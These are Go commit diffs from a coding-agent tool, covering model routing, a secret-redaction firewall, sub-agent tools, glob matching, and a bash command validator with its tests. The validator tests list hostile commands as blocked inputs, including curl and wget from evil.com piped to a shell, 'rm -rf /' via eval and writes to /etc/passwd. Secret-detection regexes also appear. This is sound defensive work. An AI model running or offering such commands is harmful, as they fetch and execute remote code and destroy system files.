if p.TTFTMs < 80 || p.TTFTMs > 90 {
t.Errorf("TTFTMs = %f, want ~85 (EMA of 100→50)", p.TTFTMs)
}
}
func TestArmPerf_Update_ZeroDuration(t *testing.T) {
var p ArmPerf
p.Update(10*time.Millisecond, 100, 0) // zero stream duration
if p.Samples != 1 {
t.Errorf("Samples = %d, want 1", p.Samples)
}
if p.ToksPerSec != 0 { // undefined throughput → 0
t.Errorf("ToksPerSec = %f, want 0 for zero duration", p.ToksPerSec)
}
}
// --- Gap C: QualityThreshold ---
func TestFilterFeasible_RejectsLowQualityArm(t *testing.T) {
// Arm with no capabilities — heuristicQuality ≈ 0.5, below security_review minimum (0.88)
lowQualityArm := &Arm{
ID: "a/basic",
Capabilities: provider.Capabilities{ToolUse: true, ContextWindow: 4096},
}
highQualityArm := &Arm{
ID: "b/powerful",
Capabilities: provider.Capabilities{
ToolUse: true,
Thinking: true, // thinking boosts score for security review
ContextWindow: 200000,
},
}
task := Task{
Type: TaskSecurityReview,
RequiresTools: true,
Priority: PriorityHigh,
}
feasible := filterFeasible([]*Arm{lowQualityArm, highQualityArm}, task)
// highQualityArm should be in feasible; lowQualityArm should be filtered
if len(feasible) != 1 {
t.Fatalf("len(feasible) = %d, want 1", len(feasible))
}
if feasible[0].ID != "b/powerful" {
t.Errorf("feasible[0] = %s, want b/powerful", feasible[0].ID)
}
}
func TestFilterFeasible_FallsBackWhenAllBelowQuality(t *testing.T) {
// Only arm available, but quality is low — should still be returned as fallback
onlyArm := &Arm{
ID: "a/only",
Capabilities: provider.Capabilities{ToolUse: true, ContextWindow: 4096},
}
task := Task{Type: TaskSecurityReview, RequiresTools: true}
feasible := filterFeasible([]*Arm{onlyArm}, task)
if len(feasible) == 0 {
t.Error("should fall back to low-quality arm when no better option exists")
}
}

View File

@@ -14,9 +14,26 @@ const (
// RoutingDecision is the result of arm selection.
type RoutingDecision struct {
Strategy Strategy
Arm *Arm // primary arm
Error error
Strategy Strategy
Arm *Arm // primary arm
Error error
reservations []*Reservation // pool reservations held until commit/rollback
}
// Commit finalizes the routing decision, recording actual token consumption.
// Must be called when the request completes successfully.
func (d RoutingDecision) Commit(actualTokens int) {
for _, r := range d.reservations {
r.Commit(actualTokens)
}
}
// Rollback releases the routing decision's pool reservations without recording usage.
// Must be called when the request fails before any tokens are consumed.
func (d RoutingDecision) Rollback() {
for _, r := range d.reservations {
r.Rollback()
}
}
// selectBest picks the highest-scoring feasible arm using heuristic scoring.
@@ -121,9 +138,15 @@ func effectiveCost(arm *Arm, task Task) float64 {
return base * maxMultiplier
}
// filterFeasible returns arms that can handle the task (tools, pool capacity).
// filterFeasible returns arms that can handle the task (tools, pool capacity, quality).
// Arms that pass tool and pool checks but fall below the task's minimum quality threshold
// are collected separately and used as a last resort if no arm meets the threshold.
func filterFeasible(arms []*Arm, task Task) []*Arm {
threshold := DefaultThresholds[task.Type]
var feasible []*Arm
var belowQuality []*Arm // passed tool+pool but scored below minimum quality
for _, arm := range arms {
// Must support tools if task requires them
if task.RequiresTools && !arm.SupportsTools() {
@@ -143,13 +166,26 @@ func filterFeasible(arms []*Arm, task Task) []*Arm {
continue
}
// Quality floor: arms below minimum are set aside, not discarded
if heuristicQuality(arm, task) < threshold.Minimum {
belowQuality = append(belowQuality, arm)
continue
}
feasible = append(feasible, arm)
}
// If no arm with tools is feasible but task requires them,
// fall back to any available arm (tool-less is better than nothing)
// Degrade gracefully: if no arm meets quality threshold, use below-quality ones
if len(feasible) == 0 && len(belowQuality) > 0 {
return belowQuality
}
// If still empty and task requires tools, relax pool checks (last resort)
if len(feasible) == 0 && task.RequiresTools {
for _, arm := range arms {
if !arm.Capabilities.ToolUse {
continue
}
poolsOK := true
for _, pool := range arm.Pools {
if !pool.CanAfford(arm.ID, task.EstimatedTokens) {

View File

@@ -99,17 +99,19 @@ type QualityThreshold struct {
Target float64 // ideal
}
// DefaultThresholds are calibrated for M4 heuristic scores (range ~00.85).
// M9 will replace these with bandit-derived values once quality data accumulates.
var DefaultThresholds = map[TaskType]QualityThreshold{
TaskBoilerplate: {0.50, 0.70, 0.80},
TaskGeneration: {0.60, 0.75, 0.88},
TaskRefactor: {0.65, 0.78, 0.90},
TaskReview: {0.70, 0.82, 0.92},
TaskUnitTest: {0.60, 0.75, 0.85},
TaskPlanning: {0.75, 0.88, 0.95},
TaskOrchestration: {0.80, 0.90, 0.96},
TaskSecurityReview: {0.88, 0.94, 0.99},
TaskDebug: {0.65, 0.80, 0.90},
TaskExplain: {0.55, 0.72, 0.85},
TaskBoilerplate: {0.40, 0.55, 0.70}, // any capable arm works
TaskGeneration: {0.45, 0.60, 0.75},
TaskRefactor: {0.50, 0.65, 0.78},
TaskReview: {0.55, 0.68, 0.80},
TaskUnitTest: {0.45, 0.60, 0.75},
TaskPlanning: {0.60, 0.72, 0.82},
TaskOrchestration: {0.65, 0.75, 0.83},
TaskSecurityReview: {0.70, 0.78, 0.84}, // requires thinking or large context window
TaskDebug: {0.50, 0.65, 0.78},
TaskExplain: {0.40, 0.55, 0.72},
}
// ClassifyTask infers a TaskType from the user's prompt using keyword heuristics.

View File

@@ -1,6 +1,7 @@
package security
import (
"encoding/json"
"log/slog"
"somegit.dev/Owlibou/gnoma/internal/message"
@@ -96,8 +97,18 @@ func (f *Firewall) scanMessage(m message.Message) message.Message {
} else {
cleaned.Content[i] = c
}
case message.ContentToolCall:
// Scan LLM-generated tool arguments for accidentally embedded secrets
if c.ToolCall != nil {
tc := *c.ToolCall
scanned := f.scanAndRedact(string(tc.Arguments), "tool_call_args")
tc.Arguments = json.RawMessage(scanned)
cleaned.Content[i] = message.NewToolCallContent(tc)
} else {
cleaned.Content[i] = c
}
default:
// Tool calls, thinking blocks — pass through
// Thinking blocks — pass through
cleaned.Content[i] = c
}
}
@@ -115,11 +126,20 @@ func (f *Firewall) scanAndRedact(content, source string) string {
}
for _, m := range matches {
f.logger.Warn("secret detected",
"pattern", m.Pattern,
"action", m.Action,
"source", source,
)
switch m.Action {
case ActionBlock:
f.logger.Error("blocked: secret detected",
"pattern", m.Pattern,
"source", source,
)
return "[BLOCKED: content contained " + m.Pattern + "]"
default:
f.logger.Debug("secret redacted",
"pattern", m.Pattern,
"action", m.Action,
"source", source,
)
}
}
return Redact(content, matches)

View File

@@ -1,9 +1,9 @@
package security
import (
"fmt"
"math"
"regexp"
"strings"
)
// ScanAction determines what to do when a secret is found.
@@ -68,7 +68,7 @@ func (s *Scanner) Scan(content string) []SecretMatch {
for _, p := range s.patterns {
locs := p.Regex.FindAllStringIndex(content, -1)
for _, loc := range locs {
key := strings.Join([]string{p.Name, string(rune(loc[0])), string(rune(loc[1]))}, ":")
key := fmt.Sprintf("%s:%d:%d", p.Name, loc[0], loc[1])
if seen[key] {
continue
}
@@ -232,7 +232,7 @@ func defaultPatterns() []SecretPattern {
// --- Generic ---
{"generic_secret_assign", `(?i)(?:password|secret|token|api_key|apikey|auth)\s*[:=]\s*['"][a-zA-Z0-9_/+=\-]{8,}['"]`},
{"env_secret", `(?i)^[A-Z_]{2,}(?:_KEY|_SECRET|_TOKEN|_PASSWORD)\s*=\s*.{8,}$`},
{"env_secret", `(?im)^[A-Z_]{2,}(?:_KEY|_SECRET|_TOKEN|_PASSWORD)\s*=\s*.{8,}$`},
}
var result []SecretPattern

View File

@@ -375,3 +375,48 @@ func TestFirewall_UnicodeCleanedBeforeSecretScan(t *testing.T) {
t.Error("unicode tags should be stripped")
}
}
func TestFirewall_ActionBlockReturnsBlockedString(t *testing.T) {
// Pattern with ActionBlock should return a blocked marker, not the original content
fw := NewFirewall(FirewallConfig{
ScanOutgoing: true,
EntropyThreshold: 3.0,
})
if err := fw.Scanner().AddPattern("test_block", `BLOCK_THIS_SECRET`, ActionBlock); err != nil {
t.Fatalf("AddPattern: %v", err)
}
msgs := []message.Message{
message.NewUserText("some text BLOCK_THIS_SECRET more text"),
}
cleaned := fw.ScanOutgoingMessages(msgs)
text := cleaned[0].TextContent()
if strings.Contains(text, "BLOCK_THIS_SECRET") {
t.Error("ActionBlock content should not pass through")
}
if !strings.Contains(text, "[BLOCKED:") {
t.Errorf("expected [BLOCKED: ...] marker, got %q", text)
}
}
func TestScanner_DedupKeyNoCollision(t *testing.T) {
// Two matches at byte offsets > 127 in the same pattern should both appear,
// not get deduplicated because of hash collision in the key.
s := NewScanner(3.0)
// Build a string where two matches appear after offset 127
prefix := strings.Repeat("x", 128) // push matches past offset 127
input := prefix + "sk-ant-api03-aaaaaaaabbbbbbbbcccccccc " + prefix + "sk-ant-api03-ddddddddeeeeeeeeffffffff"
matches := s.Scan(input)
count := 0
for _, m := range matches {
if m.Pattern == "anthropic_api_key" {
count++
}
}
if count < 2 {
t.Errorf("expected 2 distinct Anthropic key matches after offset 127, got %d (dedup key collision?)", count)
}
}

View File

@@ -39,6 +39,11 @@ func NewLocal(eng *engine.Engine, providerName, model string) *Local {
}
func (s *Local) Send(input string) error {
return s.SendWithOptions(input, engine.TurnOptions{})
}
// SendWithOptions is like Send but applies per-turn engine options.
func (s *Local) SendWithOptions(input string, opts engine.TurnOptions) error {
s.mu.Lock()
if s.state != StateIdle {
s.mu.Unlock()
@@ -64,7 +69,7 @@ func (s *Local) Send(input string) error {
}
}
turn, err := s.eng.Submit(ctx, input, cb)
turn, err := s.eng.SubmitWithOptions(ctx, input, opts, cb)
s.mu.Lock()
s.turn = turn

View File

@@ -53,6 +53,8 @@ type Status struct {
type Session interface {
// Send submits user input and begins an agentic turn.
Send(input string) error
// SendWithOptions is like Send but applies per-turn engine options.
SendWithOptions(input string, opts engine.TurnOptions) error
// Events returns the channel that receives streaming events.
// A new channel is created per Send(). Closed when the turn completes.
Events() <-chan stream.Event

View File

@@ -27,7 +27,7 @@ var paramSchema = json.RawMessage(`{
},
"max_turns": {
"type": "integer",
"description": "Maximum tool-calling rounds for the elf (default 30)"
"description": "Maximum tool-calling rounds for the elf (0 or omit = unlimited)"
}
},
"required": ["prompt"]
@@ -51,9 +51,8 @@ func (t *Tool) SetProgressCh(ch chan<- elf.Progress) {
func (t *Tool) Name() string { return "agent" }
func (t *Tool) Description() string { return "Spawn a sub-agent (elf) to handle a task independently. The elf gets its own conversation and tools. IMPORTANT: To spawn multiple elfs in parallel, call this tool multiple times in the SAME response — do not wait for one to finish before spawning the next." }
func (t *Tool) Parameters() json.RawMessage { return paramSchema }
func (t *Tool) IsReadOnly() bool { return true }
func (t *Tool) IsDestructive() bool { return false }
func (t *Tool) ShouldDefer() bool { return true }
func (t *Tool) IsReadOnly() bool { return true }
func (t *Tool) IsDestructive() bool { return false }
type agentArgs struct {
Prompt string `json:"prompt"`
@@ -70,11 +69,8 @@ func (t *Tool) Execute(ctx context.Context, args json.RawMessage) (tool.Result,
return tool.Result{}, fmt.Errorf("agent: prompt required")
}
taskType := parseTaskType(a.TaskType)
taskType := parseTaskType(a.TaskType, a.Prompt)
maxTurns := a.MaxTurns
if maxTurns <= 0 {
maxTurns = 30 // default
}
// Truncate description for tree display
desc := a.Prompt
@@ -236,7 +232,9 @@ func formatTokens(tokens int) string {
return fmt.Sprintf("%d tokens", tokens)
}
func parseTaskType(s string) router.TaskType {
// parseTaskType maps explicit task_type hints to router TaskType.
// When no hint is provided (empty string), auto-classifies from the prompt.
func parseTaskType(s string, prompt string) router.TaskType {
switch strings.ToLower(s) {
case "generation":
return router.TaskGeneration
@@ -251,6 +249,6 @@ func parseTaskType(s string) router.TaskType {
case "planning":
return router.TaskPlanning
default:
return router.TaskGeneration
return router.ClassifyTask(prompt).Type
}
}

View File

@@ -0,0 +1,52 @@
package agent
import (
"testing"
"somegit.dev/Owlibou/gnoma/internal/router"
)
func TestParseTaskType_ExplicitHintTakesPrecedence(t *testing.T) {
// Explicit hints should override prompt classification
tests := []struct {
hint string
prompt string
want router.TaskType
}{
{"review", "fix the bug", router.TaskReview},
{"refactor", "write tests", router.TaskRefactor},
{"debug", "plan the architecture", router.TaskDebug},
{"explain", "implement the feature", router.TaskExplain},
{"planning", "debug the crash", router.TaskPlanning},
{"generation", "review the code", router.TaskGeneration},
}
for _, tt := range tests {
got := parseTaskType(tt.hint, tt.prompt)
if got != tt.want {
t.Errorf("parseTaskType(%q, %q) = %s, want %s", tt.hint, tt.prompt, got, tt.want)
}
}
}
func TestParseTaskType_AutoClassifiesWhenNoHint(t *testing.T) {
// No hint → classify from prompt instead of defaulting to TaskGeneration
tests := []struct {
prompt string
want router.TaskType
}{
{"review this pull request", router.TaskReview},
{"fix the failing test", router.TaskDebug},
{"refactor the auth module", router.TaskRefactor},
{"write unit tests for handler", router.TaskUnitTest},
{"explain how the router works", router.TaskExplain},
{"audit security of the API", router.TaskSecurityReview},
{"plan the migration strategy", router.TaskPlanning},
{"scaffold a new service", router.TaskBoilerplate},
}
for _, tt := range tests {
got := parseTaskType("", tt.prompt)
if got != tt.want {
t.Errorf("parseTaskType(%q) = %s, want %s (auto-classified)", tt.prompt, got, tt.want)
}
}
}

View File

@@ -39,7 +39,7 @@ var batchSchema = json.RawMessage(`{
},
"max_turns": {
"type": "integer",
"description": "Maximum tool-calling rounds per elf (default 30)"
"description": "Maximum tool-calling rounds per elf (0 or omit = unlimited)"
}
},
"required": ["tasks"]
@@ -62,9 +62,8 @@ func (t *BatchTool) SetProgressCh(ch chan<- elf.Progress) {
func (t *BatchTool) Name() string { return "spawn_elfs" }
func (t *BatchTool) Description() string { return "Spawn multiple elfs (sub-agents) in parallel. Use this when you need to run 2+ independent tasks concurrently. Each elf gets its own conversation and tools. All elfs run simultaneously and results are collected when all complete." }
func (t *BatchTool) Parameters() json.RawMessage { return batchSchema }
func (t *BatchTool) IsReadOnly() bool { return true }
func (t *BatchTool) IsDestructive() bool { return false }
func (t *BatchTool) ShouldDefer() bool { return true }
func (t *BatchTool) IsReadOnly() bool { return true }
func (t *BatchTool) IsDestructive() bool { return false }
type batchArgs struct {
Tasks []batchTask `json:"tasks"`
@@ -89,9 +88,6 @@ func (t *BatchTool) Execute(ctx context.Context, args json.RawMessage) (tool.Res
}
maxTurns := a.MaxTurns
if maxTurns <= 0 {
maxTurns = 30
}
systemPrompt := "You are an elf — a focused sub-agent of gnoma. Complete the given task thoroughly and concisely. Use tools as needed."
@@ -116,7 +112,7 @@ func (t *BatchTool) Execute(ctx context.Context, args json.RawMessage) (tool.Res
}
}
taskType := parseTaskType(task.TaskType)
taskType := parseTaskType(task.TaskType, task.Prompt)
e, err := t.manager.Spawn(ctx, taskType, task.Prompt, systemPrompt, maxTurns)
if err != nil {
for _, entry := range elfs {

View File

@@ -5,6 +5,7 @@ import (
"fmt"
"os"
"os/exec"
"sort"
"strings"
"sync"
"time"
@@ -48,6 +49,36 @@ func (m *AliasMap) All() map[string]string {
return cp
}
// AliasSummary returns a compact, LLM-readable summary of command-replacement aliases —
// those where the expansion's first word differs from the alias name (e.g. find → fd).
// Flag-only aliases (ls → ls --color=auto) are excluded. Returns "" if none found.
func (m *AliasMap) AliasSummary() string {
if m == nil {
return ""
}
m.mu.RLock()
defer m.mu.RUnlock()
var replacements []string
for name, expansion := range m.aliases {
firstWord := expansion
if idx := strings.IndexAny(expansion, " \t"); idx != -1 {
firstWord = expansion[:idx]
}
if firstWord != name && firstWord != "" {
replacements = append(replacements, name+" → "+firstWord)
}
}
if len(replacements) == 0 {
return ""
}
sort.Strings(replacements)
return "Shell command replacements (use replacement's syntax, not original): " +
strings.Join(replacements, ", ") + "."
}
// ExpandCommand expands the first word of a command if it's a known alias.
// Only the first word is expanded (matching bash alias behavior).
// Returns the original command unchanged if no alias matches.

View File

@@ -2,6 +2,7 @@ package bash
import (
"context"
"strings"
"testing"
)
@@ -265,6 +266,51 @@ func TestHarvestAliases_Integration(t *testing.T) {
}
}
func TestAliasMap_AliasSummary(t *testing.T) {
m := NewAliasMap()
m.mu.Lock()
m.aliases["find"] = "fd"
m.aliases["grep"] = "rg --color=auto"
m.aliases["ls"] = "ls --color=auto" // flag-only, same command — should be excluded
m.aliases["ll"] = "ls -la" // replacement to different command — included
m.mu.Unlock()
summary := m.AliasSummary()
if summary == "" {
t.Fatal("AliasSummary should return non-empty string")
}
for _, want := range []string{"find → fd", "grep → rg", "ll → ls"} {
if !strings.Contains(summary, want) {
t.Errorf("AliasSummary missing %q, got: %q", want, summary)
}
}
// ls → ls (flag-only) should NOT appear
if strings.Contains(summary, "ls → ls") {
t.Errorf("AliasSummary should exclude flag-only aliases (ls → ls), got: %q", summary)
}
}
func TestAliasMap_AliasSummary_Empty(t *testing.T) {
m := NewAliasMap()
m.mu.Lock()
m.aliases["ls"] = "ls --color=auto" // same base command, flags only — excluded
m.mu.Unlock()
if got := m.AliasSummary(); got != "" {
t.Errorf("AliasSummary for same-command aliases should be empty, got %q", got)
}
}
func TestAliasMap_AliasSummary_Nil(t *testing.T) {
var m *AliasMap
if got := m.AliasSummary(); got != "" {
t.Errorf("nil AliasMap.AliasSummary() should return empty, got %q", got)
}
}
func TestBashTool_WithAliases(t *testing.T) {
aliases := NewAliasMap()
aliases.mu.Lock()

View File

@@ -24,6 +24,7 @@ const (
CheckUnicodeWhitespace // non-ASCII whitespace
CheckZshDangerous // zsh-specific dangerous constructs
CheckCommentDesync // # inside strings hiding commands
CheckIndirectExec // eval, bash -c, curl|bash, source
)
// SecurityViolation describes a failed security check.
@@ -89,6 +90,9 @@ func ValidateCommand(cmd string) *SecurityViolation {
if v := checkCommentQuoteDesync(cmd); v != nil {
return v
}
if v := checkIndirectExec(cmd); v != nil {
return v
}
return nil
}
@@ -247,6 +251,7 @@ func checkStandaloneSemicolon(cmd string) *SecurityViolation {
}
// checkSensitiveRedirection blocks output redirection to sensitive paths.
// Detects: >, >>, fd redirects (2>), and no-space variants (>/etc/passwd).
func checkSensitiveRedirection(cmd string) *SecurityViolation {
sensitiveTargets := []string{
"/etc/passwd", "/etc/shadow", "/etc/sudoers",
@@ -256,7 +261,14 @@ func checkSensitiveRedirection(cmd string) *SecurityViolation {
}
for _, target := range sensitiveTargets {
if strings.Contains(cmd, "> "+target) || strings.Contains(cmd, ">>"+target) {
// Match any form: >, >>, 2>, 2>>, &> followed by optional whitespace then target
idx := strings.Index(cmd, target)
if idx <= 0 {
continue
}
// Check what precedes the target (skip whitespace backwards)
pre := strings.TrimRight(cmd[:idx], " \t")
if len(pre) > 0 && (pre[len(pre)-1] == '>' || strings.HasSuffix(pre, ">>")) {
return &SecurityViolation{
Check: CheckRedirection,
Message: fmt.Sprintf("redirection to sensitive path: %s", target),
@@ -384,14 +396,14 @@ func checkUnicodeWhitespace(cmd string) *SecurityViolation {
}
// checkZshDangerous detects zsh-specific dangerous constructs.
// Note: <() and >() are intentionally excluded — they are also valid bash process
// substitution patterns used in legitimate commands (e.g., diff <(cmd1) <(cmd2)).
func checkZshDangerous(cmd string) *SecurityViolation {
dangerousPatterns := []struct {
pattern string
msg string
}{
{"=(", "zsh process substitution =() (arbitrary execution)"},
{">(", "zsh output process substitution >()"},
{"<(", "zsh input process substitution <()"},
{"=(", "zsh =() process substitution (arbitrary execution)"},
{"zmodload", "zsh module loading (can load arbitrary code)"},
{"sysopen", "zsh sysopen (direct file descriptor access)"},
{"ztcp", "zsh TCP socket access"},
@@ -476,3 +488,51 @@ func checkDangerousVars(cmd string) *SecurityViolation {
}
return nil
}
// checkIndirectExec blocks commands that run arbitrary code indirectly,
// bypassing all other security checks applied to the outer command string.
// These are the highest-risk patterns in an agentic context.
func checkIndirectExec(cmd string) *SecurityViolation {
lower := strings.ToLower(cmd)
// Patterns that execute arbitrary content not visible to the checker.
// Each entry is a substring to look for (after lowercasing).
patterns := []struct {
needle string
msg string
}{
{"eval ", "eval executes arbitrary code (bypasses all checks)"},
{"eval\t", "eval executes arbitrary code (bypasses all checks)"},
{"bash -c", "bash -c executes arbitrary inline code"},
{"sh -c", "sh -c executes arbitrary inline code"},
{"zsh -c", "zsh -c executes arbitrary inline code"},
{"| bash", "pipe to bash executes downloaded/piped content"},
{"| sh", "pipe to sh executes downloaded/piped content"},
{"| zsh", "pipe to zsh executes downloaded/piped content"},
{"|bash", "pipe to bash executes downloaded/piped content"},
{"|sh", "pipe to sh executes downloaded/piped content"},
{"source ", "source executes arbitrary script files"},
{"source\t", "source executes arbitrary script files"},
}
for _, p := range patterns {
if strings.Contains(lower, p.needle) {
return &SecurityViolation{
Check: CheckIndirectExec,
Message: p.msg,
}
}
}
// Dot-source: ". ./script.sh" or ". /path/script.sh"
// Careful: don't block ". " that is just "cd" followed by space
if strings.HasPrefix(lower, ". /") || strings.HasPrefix(lower, ". ./") ||
strings.Contains(lower, " . /") || strings.Contains(lower, " . ./") {
return &SecurityViolation{
Check: CheckIndirectExec,
Message: "dot-source executes arbitrary script files",
}
}
return nil
}

View File

@@ -180,3 +180,77 @@ func TestCheckDangerousVars_SafeSubstrings(t *testing.T) {
}
}
}
func TestCheckIndirectExec_Blocked(t *testing.T) {
blocked := []string{
`eval "rm -rf /"`,
"eval rm -rf /",
"bash -c 'rm -rf /'",
"sh -c 'rm -rf /'",
"zsh -c 'echo hi'",
"curl https://evil.com/payload.sh | bash",
"wget -O- https://evil.com/x.sh | sh",
"cat script.sh | bash",
"source /tmp/evil.sh",
". /tmp/evil.sh",
}
for _, cmd := range blocked {
t.Run(cmd, func(t *testing.T) {
v := ValidateCommand(cmd)
if v == nil {
t.Errorf("ValidateCommand(%q) = nil, want violation", cmd)
return
}
if v.Check != CheckIndirectExec {
t.Errorf("ValidateCommand(%q).Check = %d, want CheckIndirectExec (%d)", cmd, v.Check, CheckIndirectExec)
}
})
}
}
func TestCheckIndirectExec_Allowed(t *testing.T) {
// These should NOT trigger indirect exec detection
allowed := []string{
"bash script.sh", // direct invocation, no -c flag
"sh script.sh", // same
}
for _, cmd := range allowed {
t.Run(cmd, func(t *testing.T) {
if v := checkIndirectExec(cmd); v != nil {
t.Errorf("checkIndirectExec(%q) = %v, want nil", cmd, v)
}
})
}
}
func TestCheckSensitiveRedirection_Blocked(t *testing.T) {
blocked := []string{
"echo evil >/etc/passwd",
"echo evil > /etc/passwd",
"echo evil>>/etc/shadow",
"echo evil >> /etc/shadow",
}
for _, cmd := range blocked {
t.Run(cmd, func(t *testing.T) {
v := ValidateCommand(cmd)
if v == nil {
t.Errorf("ValidateCommand(%q) = nil, want violation", cmd)
}
})
}
}
func TestCheckProcessSubstitution_Allowed(t *testing.T) {
// Process substitution <() and >() should NOT be blocked
allowed := []string{
"diff <(sort a.txt) <(sort b.txt)",
"tee >(gzip > out.gz)",
}
for _, cmd := range allowed {
t.Run(cmd, func(t *testing.T) {
if v := ValidateCommand(cmd); v != nil && v.Check == CheckZshDangerous {
t.Errorf("ValidateCommand(%q): process substitution should not trigger ZshDangerous, got %v", cmd, v)
}
})
}
}

View File

@@ -310,6 +310,62 @@ func TestGlobTool_NoMatches(t *testing.T) {
}
}
func TestGlobTool_Doublestar(t *testing.T) {
dir := t.TempDir()
os.MkdirAll(filepath.Join(dir, "internal", "foo"), 0o755)
os.MkdirAll(filepath.Join(dir, "cmd", "bar"), 0o755)
os.WriteFile(filepath.Join(dir, "main.go"), []byte(""), 0o644)
os.WriteFile(filepath.Join(dir, "internal", "foo", "foo.go"), []byte(""), 0o644)
os.WriteFile(filepath.Join(dir, "cmd", "bar", "bar.go"), []byte(""), 0o644)
os.WriteFile(filepath.Join(dir, "cmd", "bar", "bar_test.go"), []byte(""), 0o644)
g := NewGlobTool()
tests := []struct {
pattern string
want int
}{
{"**/*.go", 4},
{"**/*_test.go", 1},
{"internal/**/*.go", 1},
{"cmd/**/*.go", 2},
{"*.go", 1}, // only root-level, no ** — existing behaviour unchanged
}
for _, tc := range tests {
result, err := g.Execute(context.Background(), mustJSON(t, globArgs{Pattern: tc.pattern, Path: dir}))
if err != nil {
t.Fatalf("pattern %q: Execute: %v", tc.pattern, err)
}
if result.Metadata["count"] != tc.want {
t.Errorf("pattern %q: count = %v, want %d\noutput:\n%s", tc.pattern, result.Metadata["count"], tc.want, result.Output)
}
}
}
func TestMatchGlob_DoublestarEdgeCases(t *testing.T) {
tests := []struct {
pattern string
name string
want bool
}{
{"**/*.go", "main.go", true},
{"**/*.go", "internal/foo/foo.go", true},
{"**/*.go", "a/b/c/d.go", true},
{"**/*.go", "main.ts", false},
{"internal/**/*.go", "internal/foo/bar.go", true},
{"internal/**/*.go", "cmd/foo/bar.go", false},
{"**", "anything/goes", true},
{"*.go", "main.go", true},
{"*.go", "sub/main.go", false}, // no ** — single level only
}
for _, tc := range tests {
got := matchGlob(tc.pattern, tc.name)
if got != tc.want {
t.Errorf("matchGlob(%q, %q) = %v, want %v", tc.pattern, tc.name, got, tc.want)
}
}
}
// --- Grep ---
func TestGrepTool_Interface(t *testing.T) {

View File

@@ -5,6 +5,7 @@ import (
"encoding/json"
"fmt"
"os"
"path"
"path/filepath"
"sort"
"strings"
@@ -80,13 +81,7 @@ func (t *GlobTool) Execute(_ context.Context, args json.RawMessage) (tool.Result
return nil
}
matched, err := filepath.Match(a.Pattern, rel)
if err != nil {
// Try matching just the filename for simple patterns
matched, _ = filepath.Match(a.Pattern, d.Name())
}
if matched {
if matchGlob(a.Pattern, rel) {
matches = append(matches, rel)
}
return nil
@@ -115,3 +110,50 @@ func (t *GlobTool) Execute(_ context.Context, args json.RawMessage) (tool.Result
Metadata: map[string]any{"count": len(matches), "pattern": a.Pattern},
}, nil
}
// matchGlob matches a relative path against a glob pattern.
// Unlike filepath.Match, it supports ** to match zero or more path components.
func matchGlob(pattern, name string) bool {
// Normalize to forward slashes for consistent component splitting.
pattern = filepath.ToSlash(pattern)
name = filepath.ToSlash(name)
if !strings.Contains(pattern, "**") {
ok, _ := filepath.Match(pattern, filepath.FromSlash(name))
return ok
}
return matchComponents(strings.Split(pattern, "/"), strings.Split(name, "/"))
}
// matchComponents recursively matches pattern segments against path segments.
// A "**" segment matches zero or more consecutive path components.
func matchComponents(pats, parts []string) bool {
for len(pats) > 0 {
if pats[0] == "**" {
// Consume all leading ** segments.
for len(pats) > 0 && pats[0] == "**" {
pats = pats[1:]
}
if len(pats) == 0 {
return true // trailing ** matches everything
}
// Try anchoring the remaining pattern at each position.
for i := range parts {
if matchComponents(pats, parts[i:]) {
return true
}
}
return false
}
if len(parts) == 0 {
return false
}
ok, err := path.Match(pats[0], parts[0])
if err != nil || !ok {
return false
}
pats = pats[1:]
parts = parts[1:]
}
return len(parts) == 0
}

View File

@@ -3,6 +3,7 @@ package tool
import (
"encoding/json"
"fmt"
"sort"
"sync"
)
@@ -40,7 +41,7 @@ func (r *Registry) Get(name string) (Tool, bool) {
return t, ok
}
// All returns all registered tools.
// All returns all registered tools sorted by name for deterministic ordering.
func (r *Registry) All() []Tool {
r.mu.RLock()
defer r.mu.RUnlock()
@@ -48,10 +49,11 @@ func (r *Registry) All() []Tool {
for _, t := range r.tools {
all = append(all, t)
}
sort.Slice(all, func(i, j int) bool { return all[i].Name() < all[j].Name() })
return all
}
// Definitions returns tool definitions for all registered tools,
// Definitions returns tool definitions for all registered tools sorted by name,
// suitable for sending to the LLM.
func (r *Registry) Definitions() []Definition {
r.mu.RLock()
@@ -64,6 +66,7 @@ func (r *Registry) Definitions() []Definition {
Parameters: t.Parameters(),
})
}
sort.Slice(defs, func(i, j int) bool { return defs[i].Name < defs[j].Name })
return defs
}

File diff suppressed because it is too large Load Diff

View File

@@ -94,6 +94,14 @@ var (
sText = lipgloss.NewStyle().
Foreground(cText)
sThinkingLabel = lipgloss.NewStyle().
Foreground(cOverlay).
Italic(true)
sThinkingBody = lipgloss.NewStyle().
Foreground(cOverlay).
Italic(true)
)
// Status bar